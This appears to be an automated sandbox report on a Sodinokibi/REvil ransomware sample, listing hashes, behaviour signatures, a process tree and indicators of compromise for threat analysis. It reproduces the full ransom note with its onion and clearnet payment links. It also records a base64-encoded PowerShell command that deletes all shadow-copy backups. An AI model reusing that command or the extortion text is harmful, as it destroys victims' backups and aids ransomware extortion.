Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    03-02-2024 19:27

General

  • Target

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe

  • Size

    166KB

  • MD5

    44c753ed1faec948b0d98bc9ba047469

  • SHA1

    1aa2d575752dcfa73ea8bd2fa666e18588be353c

  • SHA256

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01

  • SHA512

    f7d4c3988f82839264e83c1a17024c695bd8ff31a224eba3cfc9e3712758be5450521c1e52c246b02dad0849bdf381ad40d77e9b5bab6f8135f07219c13047e0

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QoIeXt5KCn16:ZJ0BXScFy2RsQJ8zg9edTn1

Score
10/10

Malware Config

Extracted

Path

C:\Users\5c0x4h0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5c0x4h0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C542EFCA37223102 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C542EFCA37223102 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: nXZX9hI4wzAJoNoUne0FItHoBQPyaWuofxKXgPi8JmOegVcd8PkRbxoKGrFRasum kRsv1o2tiNKNRNb8XcXu3aUMaCSwVwabiq0gSHHF4B8onMcrTo5c58dDPIJdLsla FC0F7OffcFcGMSZBUW3Ha5twyV80y1OJl0GWwOPou1tPA5K6hGvn/AKcCVaeXDVD R0bw44sm1qSQL2Pos+lUUErhJssW0eVcADPtWEEVAklqMVN8LFwdoPbcnFTFlTLr 9+B5+X64VUyxrwSEou5K2wsRGa0Gi7pajKDBqgzKae3xOCvaDctI8LkLDJvJPMhV PMWEWb9SklP/Eu1fNGDYKumau6wALx92BQ8zCysKqGRlpl1YDVh8Rn7QP1uNfuXo HwxlhGeyqenSVXkQxnNyJ2eZuQUzQ3P/2WTzs+fFmbb9r6PCvpV/t2D0O08SNru9 va2+sSxQsu61BZ+tiodozsOQth9U9aY4RXHqLXyLPaA4xlomkOW81wsSLBZO8VLg k6QDvVuTVQjHjLxk+MHfh9Ii0dAHGsLEwFbvjxmj1CXwxy0WBH6vOIloMxoc3EmK KKjFR91dA5AzptNe2KxkIOPSNUT5lBTsL26/7VPLs8ufCPiyw3EbmSVejVGUgN7l a+jdxwa+WJc9DTFtJl0WH6lNfrl+Y3c0rhrutrmYop8c5zmIiCdMFQDKdylWd8QD ZSW9dVua+quzUla/2DG8XW58eyMgGzywrRAbHSwAJBixnNMrVS5HoVOGUUcIyDaK puXYNl7HRmZNOXo/emh+Jzjg1ryc+Yfp10CZ7bDDwYIjjmQb71hGAjRU7kMyekBk 5R5KenDM9RFE6WZsYH1GkK4KQknZ0xPlMsoFz+wJ7fGZOsKaY6LigugKf05TqDbH USdJPdOLiMHLrO6vPaOjfiOCbtRVkkEkSrNi6qeeGDeuernutGt78sojyfsKO9D0 xhgk2f5ujuk1zoWEJyMhT4z1uFlJHtHieHyrHOdkMN9p2tjdujZZ70pnVm8Tjk8V wJhvBSwYQuIZeodfK5fIK7WDlUjKJsMg3Oj4VO88CFW838apHadN4JG/LBwXYxG2 apGWJ3AFa4ZNjL5cBfnQsi8n7gob9T0z1prEUDNLPFK/QOiBcCyEkodiRfWA4aX/ iSWIO0Hi/zWMyS1NsPGQVPb2jbtPNuGPDPpZNdjpXIhRuMvTrP9AvhABMR3IoD6h FPOjJokEIYHvUMq8COkEzOOsUIl65Hq06Thcgka4XrDzSnU8E6Iirz7XSDUlY2pR rr/KeL88fUxZVXMwW6oVZmJDByegfN19b3uBGezRdCUXoaf3q/X5F4z9sDTlr3+u LI4LN/0rfPjCQC4EC7XXn3bvRgTWQDR6/nYkKtWWf7s= Extension name: 5c0x4h0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C542EFCA37223102

http://decryptor.cc/C542EFCA37223102

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe
    "C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3016
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2648

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\5c0x4h0-readme.txt

      Filesize

      6KB

      MD5

      d09c32b2fb137d4bccc815a2478eec93

      SHA1

      cc55f4173c01ccb6178357a86b93ae47aac143fe

      SHA256

      f73fe494c0c4694e4ab1cb1c84fe87a147b8bb2ea14d20acbbae620ee3a19001

      SHA512

      c12db32593c279f5ac56a37220fd802a4bd8f06f7070d009c481a72080df8acfe2333c3f01d17caf264a1a66ab30ace99c57fe5563b269a450c413b3ef753d4c

    • memory/2200-4-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

    • memory/2200-5-0x0000000002220000-0x0000000002228000-memory.dmp

      Filesize

      32KB

    • memory/2200-6-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-8-0x0000000002B60000-0x0000000002BE0000-memory.dmp

      Filesize

      512KB

    • memory/2200-7-0x0000000002B60000-0x0000000002BE0000-memory.dmp

      Filesize

      512KB

    • memory/2200-9-0x0000000002B60000-0x0000000002BE0000-memory.dmp

      Filesize

      512KB

    • memory/2200-10-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-11-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

      Filesize

      9.6MB